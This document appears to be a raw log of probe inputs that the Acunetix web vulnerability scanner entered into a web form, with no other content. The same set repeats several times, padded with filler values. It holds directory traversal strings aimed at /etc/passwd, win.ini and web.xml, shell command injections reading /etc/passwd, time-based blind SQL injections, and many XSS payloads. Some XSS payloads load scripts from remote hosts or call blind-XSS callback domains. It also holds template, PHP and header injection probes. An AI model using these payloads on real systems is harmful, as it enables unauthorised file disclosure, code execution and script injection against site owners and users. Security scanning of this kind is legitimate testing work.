Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

${99003+99586}

1

1

acux3316\xc0\xbez1\xc0\xbcz2a\x90bcxuca3316

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<ScRiPt >prompt(934902)</ScRiPt>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF\web.xml

1&n949076=v918048

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1<script>prompt(903562)</script>

"|"ld

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1<ScRiPt >prompt(963750)</ScRiPt>

1

)

/etc/passwd

1

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978156></ScRiPt>

testasp.vulnweb.com

!(()&&!|*|*|

'

1

'"()

x83FEcaT'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1<ScRiPt >prompt(994550)</ScRiPt>

1

1

1

1

rEpy2kLG')

"

1<video><source onerror="javascript:prompt(993660)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

C2swD3Ev'))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905391)"></g></svg>

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<div style=width:expression(prompt(985205))>

-1

1

1

1

1

1

'

1<iframe src='data:text/html

-1)

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

'&dir&'

-1))

file:///etc/passwd

1<body onload=prompt(942596)>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

i1uoCtzo'

1

/\../\../\../\../\../\../\../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911523)>

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

GZX8bCzX')

http://hitCKe8BD6c6M.bxss.me/

1

|dir

1

WEB-INF/web.xml

1<img src=xyz OnErRor=prompt(978684)>

LNqdIhYm'))

1

comments

1

1

WEB-INF\web.xml

'|dir

1<img/src=">" onerror=alert(922672)>

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

1<ScRiPt%20>prompt(919898)</sCripT>

../../../../../../../../../../windows/win.ini

"|dir

'"

1

http://www.acunetix.tst

../../../../../../../../../../boot.ini

1

1&lt

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini.jpg

response.write(9840397*9790877)

1'"()&%<ScRiPt >prompt(901468)</ScRiPt>

1

\xf6<img acu onmouseover=prompt(955864) //\xf6>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

'"()&%<ScRiPt >prompt(997883)</ScRiPt>

1

1<input autofocus onfocus=prompt(905497)>

1

1

1

................windowswin.ini

'+response.write(9840397*9790877)+'

1_993690

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

"+response.write(9840397*9790877)+"

[url=http://www.acunetix.com]website security[/url]

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1_CKMGc <ScRiPt >prompt(909668)</ScRiPt>

1

'&cat /etc/passwd&'

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

acu9684\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9684

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

`cat /etc/passwd`

1

1

1

acux1274\xc0\xbez1\xc0\xbcz2a\x90bcxuca1274

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1<ScRiPt >prompt(992393)</ScRiPt>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100343+99265}

-1

1<script>prompt(936606)</script>

WEB-INF/web.xml

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(992561)</ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928059></ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n920060=v936242

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

WEB-INF\web.xml

-1))

1

1

1<ScRiPt >prompt(946478)</ScRiPt>

1

!(()&&!|*|*|

testasp.vulnweb.com

'

bTH3PhNa'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<video><source onerror="javascript:prompt(921352)">

^(#$!@#$)(()))******

1

"

hOfvcaNx')

1

/etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946585)"></g></svg>

'"()

1

||cat /etc/passwd

p4wo4KDl'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<div style=width:expression(prompt(908931))>

1

1

1

1

1

&dir

-1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<body onload=prompt(924462)>

'&dir&'

-1)

'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929611)>

1

-1))

acunetix_wvs_invalid_filename

"&dir&"

"

1

http://hitWAhdMQjqW3.bxss.me/

2OFjR6aU'

1

1<img src=xyz OnErRor=prompt(940736)>

1

comments

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

|dir

1<img/src=">" onerror=alert(927772)>

RNWoTePS')

1

1

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

9BOlCeuN'))

1<ScRiPt%20>prompt(934478)</sCripT>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

comments/.

1

1

1

1

WEB-INF/web.xml

1&lt

http://www.acunetix.tst

1

1

WEB-INF\web.xml

1

"|dir

\xf6<img acu onmouseover=prompt(980327) //\xf6>

'"

1

1'"()&%<ScRiPt >prompt(952031)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

<!--

1<input autofocus onfocus=prompt(983296)>

1

1

'"()&%<ScRiPt >prompt(914702)</ScRiPt>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

1

1_939711

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

response.write(9622521*9542069)

../../../../../../../../../../windows/win.ini.jpg

1_tN1Wg <ScRiPt >prompt(919644)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9622521*9542069)+'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

"+response.write(9622521*9542069)+"

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acu6531\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6531

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

acux3025\xc0\xbez1\xc0\xbcz2a\x90bcxuca3025

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1<ScRiPt >prompt(944468)</ScRiPt>

|cat /etc/passwd#

${99782+99452}

1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

WEB-INF/web.xml

'|'ld

1

1&n902524=v909598

1<script>prompt(931034)</script>

1some_inexistent_file_with_long_name%00.jpg

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(977061)</ScRiPt>

1

"|"ld

WEB-INF\web.xml

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

!(()&&!|*|*|

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931659></ScRiPt>

3pT19Nqr'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

nSRL5wZy')

'

1

'"()

1<ScRiPt >prompt(947069)</ScRiPt>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

whnYcgti'))

1

1

"

1<video><source onerror="javascript:prompt(975450)">

1

1

/etc/passwd

1

-1

1

||cat /etc/passwd

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938710)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

-1)

1

1

1

1<div style=width:expression(prompt(932686))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

'

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1<iframe src='data:text/html

1

4nbJNcgg'

"

acunetix_wvs_invalid_filename

1

1

1

http://hithwT4JIPLsC.bxss.me/

1<body onload=prompt(948392)>

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

lXmoppyg')

${@print(md5(acunetix_wvs_security_test))}

comments

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982480)>

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

WIO8BCTT'))

comments

1

1

1

1<img src=xyz OnErRor=prompt(900671)>

1

1

comments/.

1

file:///etc/passwd

1<img/src=">" onerror=alert(972876)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

1

1

1

1<ScRiPt%20>prompt(933404)</sCripT>

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1&lt

'"

1

1

"|dir

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(982194) //\xf6>

1'"()&%<ScRiPt >prompt(959235)</ScRiPt>

1

1

<!--

1

1

1

1<input autofocus onfocus=prompt(954124)>

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(962370)</ScRiPt>

1

1

response.write(9432978*9487215)

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini

1

1

1_967197

1

'+response.write(9432978*9487215)+'

[url=http://www.acunetix.com]website security[/url]

1

1

"+response.write(9432978*9487215)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

1_JaJI3 <ScRiPt >prompt(981004)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

1

1

1

acu9079\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9079

................windowswin.ini

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux3908\xc0\xbez1\xc0\xbcz2a\x90bcxuca3908

1

|cat /etc/passwd#

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100159+99326}

1<ScRiPt >prompt(991786)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

1

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<script>prompt(995065)</script>

1&n915088=v962088

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(926439)</ScRiPt>

"|"ld

-1

1

1

!(()&&!|*|*|

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902621></ScRiPt>

-1)

1

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(942266)</ScRiPt>

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

NrjQ0mMw'

1<video><source onerror="javascript:prompt(979663)">

1

'

1

1

'"()

1

zmjClwBf')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986523)"></g></svg>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

WEB-INF/web.xml

1

1

Q1fkfg5c'))

1<div style=width:expression(prompt(936465))>

1

1

"

1

1

/etc/passwd

-1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1<body onload=prompt(934459)>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976168)>

1

'

1

1

-1))

1

acunetix_wvs_invalid_filename

&dir

"

1<img src=xyz OnErRor=prompt(932063)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

zbbXUAB9'

1

http://hit8ww77uGVQX.bxss.me/

1

comments

1

1<img/src=">" onerror=alert(923971)>

${@print(md5(acunetix_wvs_security_test))}

E4xO3co1')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1<ScRiPt%20>prompt(933241)</sCripT>

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

GBAtdu90'))

1

1

1&lt

comments/.

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

\xf6<img acu onmouseover=prompt(907416) //\xf6>

"&dir&"

1

1<input autofocus onfocus=prompt(910348)>

1

http://www.acunetix.tst

1

1

file:///etc/passwd

1

1

1

'"

<a href='http://www.acunetix.com'>website security</a>

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(997945)</ScRiPt>

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

<!--

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(967682)</ScRiPt>

1

response.write(9022227*9269929)

1

1

1_WwoJo <ScRiPt >prompt(996738)</ScRiPt>

'|dir

'+response.write(9022227*9269929)+'

1_957977

1

1

1

WEB-INF\web.xml

"+response.write(9022227*9269929)+"

1

1

"|dir

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../boot.ini

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu3834\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3834

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

${100225+99009}

acux2399\xc0\xbez1\xc0\xbcz2a\x90bcxuca2399

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(939813)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

..\..\..\..\..\..\..\..\windows\win.ini

1&n924819=v999743

1

1<script>prompt(936950)</script>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(927175)</ScRiPt>

1

"|"ld

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906588></ScRiPt>

1

-1)

)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(975083)</ScRiPt>

-1))

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

jHGeCKGu'

1<video><source onerror="javascript:prompt(950560)">

!(()&&!|*|*|

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'"()

nRjf4jiW')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951459)"></g></svg>

/etc/passwd

1

^(#$!@#$)(()))******

1

1

1

"

1<div style=width:expression(prompt(905411))>

EjiazH76'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

||cat /etc/passwd

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

'

1

1<body onload=prompt(910988)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

WEB-INF/web.xml

1

1

1

"

-1))

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987815)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

WEB-INF\web.xml

${@print(md5(acunetix_wvs_security_test))}

1

'&dir&'

xK2ajael'

1

http://hitpfDeOlb4OD.bxss.me/

1<img src=xyz OnErRor=prompt(963515)>

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

"&dir&"

1<img/src=">" onerror=alert(943210)>

EhzWcDCR')

1

1

comments

file:///etc/passwd

1

1

1

1<ScRiPt%20>prompt(984013)</sCripT>

1

comments

agrqpE8H'))

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

comments/.

1&lt

1

WEB-INF/web.xml

1

1

1

1

1

PQ5xa55D'))

'|dir

\xf6<img acu onmouseover=prompt(930199) //\xf6>

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1<input autofocus onfocus=prompt(905052)>

1

"|dir

1

../../../../../../../../../../windows/win.ini

'"

http://www.acunetix.tst

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

<!--

1'"()&%<ScRiPt >prompt(972650)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

'"()&%<ScRiPt >prompt(977707)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

response.write(9830590*9657174)

1_P46GO <ScRiPt >prompt(905203)</ScRiPt>

1

1

1

1_959705

1

&cat /etc/passwd&

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

'+response.write(9830590*9657174)+'

1

1

1

"+response.write(9830590*9657174)+"

................windowswin.ini

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${100119+100261}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

acu6031\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6031

1&n936045=v986455

'|'ld

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux3262\xc0\xbez1\xc0\xbcz2a\x90bcxuca3262

1some_inexistent_file_with_long_name%00.jpg

1

1

"|"ld

if(now()=sysdate(),sleep(7.188),0)/*'XOR(if(now()=sysdate(),sleep(7.188),0))OR'"XOR(if(now()=sysdate(),sleep(7.188),0))OR"*/

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt >prompt(994443)</ScRiPt>

WEB-INF/web.xml

1

(select(0)from(select(sleep(7.188)))v)/*'+(select(0)from(select(sleep(7.188)))v)+'"+(select(0)from(select(sleep(7.188)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

!(()&&!|*|*|

1

1<script>prompt(922854)</script>

WEB-INF\web.xml

-1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

'

1<ScRiPt >prompt(967074)</ScRiPt>

-1)

1

1

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902323></ScRiPt>

/etc/passwd

-1))

1

1

1

1

"

1

1<ScRiPt >prompt(926813)</ScRiPt>

1

1

6KcWxOPC'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1<video><source onerror="javascript:prompt(963118)">

'"()

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

QSlfK8Fa')

&dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936889)"></g></svg>

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

E7L8mybY'))

"

1<div style=width:expression(prompt(993646))>

1

1

1

1

-1

${@print(md5(acunetix_wvs_security_test))}

1<iframe src='data:text/html

"&dir&"

1

http://hitlbHgsmVem9.bxss.me/

1

file:///etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<body onload=prompt(983167)>

1

acunetix_wvs_invalid_filename

-1))

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973711)>

1

comments

SyI2yPEJ'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=xyz OnErRor=prompt(968936)>

1

comments

WWg1eS5i')

'|dir

WEB-INF/web.xml

comments/.

1

1

1<img/src=">" onerror=alert(947918)>

http://www.acunetix.tst

utY1cRoQ'))

1

1

1

'"

1

1<ScRiPt%20>prompt(919720)</sCripT>

1

WEB-INF\web.xml

"|dir

1

1

<!--

1

1

1

1&lt

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

\xf6<img acu onmouseover=prompt(951864) //\xf6>

1

1'"()&%<ScRiPt >prompt(990833)</ScRiPt>

1

1<input autofocus onfocus=prompt(943300)>

../../../../../../../../../../boot.ini

1

1

'"()&%<ScRiPt >prompt(993810)</ScRiPt>

&cat /etc/passwd&

response.write(9330999*9549624)

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1_925161

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

'+response.write(9330999*9549624)+'

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"+response.write(9330999*9549624)+"

1

1_H3v6F <ScRiPt >prompt(949611)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

................windowswin.ini

1

1

1

1

cat /etc/passwd

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

